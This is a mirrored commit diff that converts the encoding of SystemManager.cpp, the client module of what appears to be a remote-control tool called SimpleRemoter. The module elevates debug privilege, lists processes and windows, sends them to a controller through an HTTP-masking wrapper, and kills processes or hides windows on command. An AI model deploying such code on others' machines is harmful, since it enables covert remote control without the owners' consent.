admin/SimpleRemoter
1
0
Fork 0
mirror of https://github.com/yuanyuanxiang/SimpleRemoter.git synced 2026-01-22 07:14:15 +08:00
Code Issues Packages Projects Releases Wiki Activity

style: Change files encoding format to UTF8-BOM

Browse Source
This commit is contained in:
yuanyuanxiang
2026-01-02 20:00:18 +01:00
parent ba9be08411
commit b6af9ce615
356 changed files with 2819 additions and 2819 deletions
Download Patch File Download Diff File Expand all files Collapse all files

94
client/SystemManager.cpp
View File

@@ -1,4 +1,4 @@
// SystemManager.cpp: implementation of the CSystemManager class.
// SystemManager.cpp: implementation of the CSystemManager class.
//
//////////////////////////////////////////////////////////////////////
@@ -24,17 +24,17 @@
CSystemManager::CSystemManager(IOCPClient* ClientObject,BOOL bHow, void* user):CManager(ClientObject)
{
if (bHow==COMMAND_SYSTEM) {
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//进程
SendProcessList();
} else if (bHow==COMMAND_WSLIST) {
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//窗口
SendWindowsList();
}
}
VOID CSystemManager::SendProcessList()
{
LPBYTE szBuffer = GetProcessList(); //<EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>б<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
LPBYTE szBuffer = GetProcessList(); //得到进程列表的数据
if (szBuffer == NULL)
return;
HttpMask mask(DEFAULT_HOST, m_ClientObject->GetClientIPHeader());
@@ -46,7 +46,7 @@ VOID CSystemManager::SendProcessList()
void CSystemManager::SendWindowsList()
{
LPBYTE szBuffer = GetWindowsList(); //<EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>б<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
LPBYTE szBuffer = GetWindowsList(); //得到窗口列表的数据
if (szBuffer == NULL)
return;
HttpMask mask(DEFAULT_HOST, m_ClientObject->GetClientIPHeader());
@@ -56,7 +56,7 @@ void CSystemManager::SendWindowsList()
LPBYTE CSystemManager::GetProcessList()
{
DebugPrivilege(SE_DEBUG_NAME,TRUE); //<EFBFBD><EFBFBD>ȡȨ<EFBFBD><EFBFBD>
DebugPrivilege(SE_DEBUG_NAME,TRUE); //提取权限
HANDLE hProcess = NULL;
HANDLE hSnapshot = NULL;
@@ -68,23 +68,23 @@ LPBYTE CSystemManager::GetProcessList()
DWORD dwOffset = 0;
DWORD dwLength = 0;
DWORD cbNeeded = 0;
HMODULE hModules = NULL; //<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>һ<EFBFBD><EFBFBD>ģ<EFBFBD><EFBFBD><EFBFBD>ľ<EFBFBD><EFBFBD><EFBFBD>
HMODULE hModules = NULL; //进程中第一个模块的句柄
LPBYTE szBuffer = (LPBYTE)LocalAlloc(LPTR, 1024); //<EFBFBD><EFBFBD>ʱ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD>»<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
LPBYTE szBuffer = (LPBYTE)LocalAlloc(LPTR, 1024); //暂时分配一下缓冲区
if (szBuffer == NULL)
return NULL;
szBuffer[0] = TOKEN_PSLIST; //ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͷ
szBuffer[0] = TOKEN_PSLIST; //注意这个是数据头
dwOffset = 1;
if(Process32First(hSnapshot, &pe32)) { //<EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><EFBFBD><EFBFBD>ж<EFBFBD>һ<EFBFBD><EFBFBD>ϵͳ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><EFBFBD>ɹ<EFBFBD>
if(Process32First(hSnapshot, &pe32)) { //得到第一个进程顺便判断一下系统快照是否成功
do {
//<EFBFBD>򿪽<EFBFBD><EFBFBD>̲<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ؾ<EFBFBD><EFBFBD><EFBFBD>
//打开进程并返回句柄
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
FALSE, pe32.th32ProcessID); //<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
FALSE, pe32.th32ProcessID); //打开目标进程
{
//ö<EFBFBD>ٵ<EFBFBD>һ<EFBFBD><EFBFBD>ģ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҳ<EFBFBD><EFBFBD><EFBFBD>ǵ<EFBFBD>ǰ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD>
//枚举第一个模块句柄也就是当前进程完整路径
EnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded);
//<EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//得到自身的完整名称
DWORD dwReturn = GetModuleFileNameEx(hProcess, hModules,
szProcessFullPath,
sizeof(szProcessFullPath));
@@ -97,18 +97,18 @@ LPBYTE CSystemManager::GetProcessList()
const char* arch = is64Bit ? "x64" : "x86";
char exeFile[300];
sprintf(exeFile, "%s:%s", pe32.szExeFile, arch);
//<EFBFBD><EFBFBD>ʼ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ռ<EFBFBD>õĻ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ǹ<EFBFBD><C7B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ķ<EFBFBD><C4B7>͵<EFBFBD><CDB5><EFBFBD><EFBFBD>ݽṹ
// <EFBFBD>˽<EFBFBD><EFBFBD><EFBFBD>ռ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݴ<EFBFBD>С
//开始计算占用的缓冲区, 我们关心他的发送的数据结构
// 此进程占用数据大小
dwLength = sizeof(DWORD) +
lstrlen(exeFile) + lstrlen(szProcessFullPath) + 2;
// <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̫С<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
// 缓冲区太小,再重新分配下
if (LocalSize(szBuffer) < (dwOffset + dwLength))
szBuffer = (LPBYTE)LocalReAlloc(szBuffer, (dwOffset + dwLength),
LMEM_ZEROINIT|LMEM_MOVEABLE);
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>memcpy<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>򻺳<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ݽṹ<DDBD><E1B9B9>
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ID+<2B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>+0+<2B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>+0 <20><><EFBFBD><EFBFBD>
//<EFBFBD><EFBFBD>Ϊ<EFBFBD>ַ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0 <20><>β<EFBFBD><CEB2>
//接下来三个memcpy就是向缓冲区里存放数据 数据结构是
//进程ID+进程名+0+进程完整名+0 进程
//因为字符数据是以0 结尾的
memcpy(szBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
dwOffset += sizeof(DWORD);
@@ -118,17 +118,17 @@ LPBYTE CSystemManager::GetProcessList()
memcpy(szBuffer + dwOffset, szProcessFullPath, lstrlen(szProcessFullPath) + 1);
dwOffset += lstrlen(szProcessFullPath) + 1;
}
} while(Process32Next(hSnapshot, &pe32)); //<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
} while(Process32Next(hSnapshot, &pe32)); //继续得到下一个快照
}
DebugPrivilege(SE_DEBUG_NAME,FALSE); //<EFBFBD><EFBFBD>ԭ<EFBFBD><EFBFBD>Ȩ
SAFE_CLOSE_HANDLE(hSnapshot); //<EFBFBD>ͷž<EFBFBD><EFBFBD><EFBFBD>
DebugPrivilege(SE_DEBUG_NAME,FALSE); //还原提权
SAFE_CLOSE_HANDLE(hSnapshot); //释放句柄
return szBuffer;
}
CSystemManager::~CSystemManager()
{
Mprintf("ϵͳ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>\n");
Mprintf("系统析构\n");
}
BOOL CSystemManager::DebugPrivilege(const char *szName, BOOL bEnable)
@@ -137,7 +137,7 @@ BOOL CSystemManager::DebugPrivilege(const char *szName, BOOL bEnable)
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD> Token <EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//进程 Token 令牌
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
bResult = FALSE;
@@ -182,7 +182,7 @@ VOID CSystemManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
break;
}
case CMD_WINDOW_TEST: { //<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
case CMD_WINDOW_TEST: { //操作窗口
TestWindow(szBuffer+1);
break;
}
@@ -192,46 +192,46 @@ VOID CSystemManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
}
}
void CSystemManager::TestWindow(LPBYTE szBuffer) //<EFBFBD><EFBFBD><EFBFBD>ڵ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>С <20><><EFBFBD>ض<EFBFBD><D8B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFB4A6>
void CSystemManager::TestWindow(LPBYTE szBuffer) //窗口的最大 最小 隐藏都在这里处理
{
DWORD Hwnd;
DWORD dHow;
memcpy((void*)&Hwnd,szBuffer,sizeof(DWORD)); //<EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ھ<EFBFBD><EFBFBD><EFBFBD>
memcpy(&dHow,szBuffer+sizeof(DWORD),sizeof(DWORD)); //<EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
memcpy((void*)&Hwnd,szBuffer,sizeof(DWORD)); //得到窗口句柄
memcpy(&dHow,szBuffer+sizeof(DWORD),sizeof(DWORD)); //得到窗口处理参数
ShowWindow((HWND__ *)Hwnd,dHow);
//<EFBFBD><EFBFBD><EFBFBD>ھ<EFBFBD><EFBFBD><EFBFBD> <20><>ɶ(<28><> С <20><><EFBFBD><EFBFBD> <20><>ԭ)
//窗口句柄 干啥(大 小 隐藏 还原)
}
VOID CSystemManager::KillProcess(LPBYTE szBuffer, UINT ulLength)
{
HANDLE hProcess = NULL;
DebugPrivilege(SE_DEBUG_NAME, TRUE); //<EFBFBD><EFBFBD>Ȩ
DebugPrivilege(SE_DEBUG_NAME, TRUE); //提权
for (int i = 0; i < ulLength; i += 4)
//<EFBFBD><EFBFBD>Ϊ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD><EFBFBD>ܸ<EFBFBD><EFBFBD><EFBFBD>ֹ<EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//因为结束的可能个不止是一个进程
{
//<EFBFBD>򿪽<EFBFBD><EFBFBD><EFBFBD>
//打开进程
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *(LPDWORD)(szBuffer + i));
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//结束进程
TerminateProcess(hProcess, 0);
SAFE_CLOSE_HANDLE(hProcess);
}
DebugPrivilege(SE_DEBUG_NAME, FALSE); //<EFBFBD><EFBFBD>ԭ<EFBFBD><EFBFBD>Ȩ
// <EFBFBD><EFBFBD><EFBFBD><EFBFBD>Sleep<EFBFBD>£<EFBFBD><EFBFBD><EFBFBD>ֹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
DebugPrivilege(SE_DEBUG_NAME, FALSE); //还原提权
// 稍稍Sleep下,防止出错
Sleep(100);
}
LPBYTE CSystemManager::GetWindowsList()
{
LPBYTE szBuffer = NULL; //char* p = NULL &p
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&szBuffer); //ע<EFBFBD><EFBFBD><EFBFBD>
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD>API<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>к<EFBFBD><EFBFBD><EFBFBD>ָ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳע<EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD> <20>ص<EFBFBD><D8B5><EFBFBD><EFBFBD><EFBFBD>
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&szBuffer); //注册函数
//如果API函数参数当中有函数指针存在
//就是向系统注册一个 回调函数
szBuffer[0] = TOKEN_WSLIST;
return szBuffer;
}
BOOL CALLBACK CSystemManager::EnumWindowsProc(HWND hWnd, LPARAM lParam) //Ҫ<EFBFBD><EFBFBD><EFBFBD><EFBFBD> **
BOOL CALLBACK CSystemManager::EnumWindowsProc(HWND hWnd, LPARAM lParam) //要数据 **
{
DWORD dwLength = 0;
DWORD dwOffset = 0;
@@ -240,24 +240,24 @@ BOOL CALLBACK CSystemManager::EnumWindowsProc(HWND hWnd, LPARAM lParam) //Ҫ
char szTitle[1024];
memset(szTitle, 0, sizeof(szTitle));
//<EFBFBD>õ<EFBFBD>ϵͳ<EFBFBD><EFBFBD><EFBFBD>ݽ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ĵ<EFBFBD><EFBFBD>ھ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ĵ<EFBFBD><EFBFBD>ڱ<EFBFBD><EFBFBD><EFBFBD>
//得到系统传递进来的窗口句柄的窗口标题
GetWindowText(hWnd, szTitle, sizeof(szTitle));
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ж<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7>ɼ<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA>
//这里判断 窗口是否可见 或标题为空
if (!IsWindowVisible(hWnd) || lstrlen(szTitle) == 0)
return true;
//ͬ<EFBFBD><EFBFBD><EFBFBD>̹<EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ķ<EFBFBD><EFBFBD>͵<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ض˵<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݽṹ
//同进程管理一样我们注意他的发送到主控端的数据结构
if (szBuffer == NULL)
szBuffer = (LPBYTE)LocalAlloc(LPTR, 1); //<EFBFBD><EFBFBD>ʱ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
szBuffer = (LPBYTE)LocalAlloc(LPTR, 1); //暂时分配缓冲区
if (szBuffer == NULL)
return FALSE;
//[<EFBFBD><EFBFBD>Ϣ][4Notepad.exe\0]
//[消息][4Notepad.exe\0]
dwLength = sizeof(DWORD) + lstrlen(szTitle) + 1;
dwOffset = LocalSize(szBuffer); //1
//<EFBFBD><EFBFBD><EFBFBD>¼<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С
//重新计算缓冲区大小
szBuffer = (LPBYTE)LocalReAlloc(szBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
if (szBuffer == NULL)
return FALSE;
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>memcpy<EFBFBD><EFBFBD><EFBFBD>ܿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݽṹΪ hwnd+<2B><><EFBFBD>ڱ<EFBFBD><DAB1><EFBFBD>+0
//下面两个memcpy就能看到数据结构为 hwnd+窗口标题+0
memcpy((szBuffer+dwOffset),&hWnd,sizeof(DWORD));
memcpy(szBuffer + dwOffset + sizeof(DWORD), szTitle, lstrlen(szTitle) + 1);